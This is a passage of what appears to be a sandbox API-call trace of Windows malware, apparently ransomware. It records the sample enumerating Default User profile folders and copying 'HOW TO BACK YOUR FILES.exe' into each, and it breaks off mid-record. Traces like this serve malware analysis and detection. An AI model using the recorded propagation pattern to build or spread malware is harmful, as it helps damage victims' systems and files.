hTemplateFile=0x0) returned 0xa4 [0078.758] GetLastError () returned 0x0 [0078.758] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.758] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.758] CloseHandle (hObject=0xa4) returned 1 [0078.758] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.759] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.760] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.760] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.760] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0078.760] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0078.760] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.760] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.761] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.761] GetLastError () returned 0x0 [0078.761] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.761] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.761] CloseHandle (hObject=0xa4) returned 1 [0078.761] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.761] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55638d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55638d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.761] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.761] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.762] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0078.762] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0078.762] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.762] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.762] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.762] GetLastError () returned 0x0 [0078.762] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.763] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.763] CloseHandle (hObject=0xa4) returned 1 [0078.763] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.763] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558c04c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558c04c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.763] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.763] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.763] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0078.763] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0078.763] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.763] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.764] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.764] GetLastError () returned 0x0 [0078.764] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.764] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.764] CloseHandle (hObject=0xa4) returned 1 [0078.764] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.764] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558e6620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558e6620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.764] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.765] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.765] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0078.765] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0078.765] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.765] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.765] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.766] GetLastError () returned 0x0 [0078.766] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.766] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559328e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559328e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.766] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.766] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.766] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0078.766] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0078.766] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.766] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.767] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.767] GetLastError () returned 0x0 [0078.767] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.767] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55958a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55958a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.767] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.767] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.768] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft" [0078.768] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft" [0078.768] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.768] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.768] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.768] GetLastError () returned 0x0 [0078.769] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.769] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.769] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.769] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.769] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0078.769] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0078.769] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.769] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.770] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.770] GetLastError () returned 0x0 [0078.770] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.770] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559a4d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559a4d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.770] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.770] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.770] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0078.770] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0078.770] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.770] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.771] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.771] GetLastError () returned 0x0 [0078.771] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.771] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.772] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.772] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.772] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0078.772] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0078.772] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.772] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.772] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.773] GetLastError () returned 0x0 [0078.773] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.773] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, 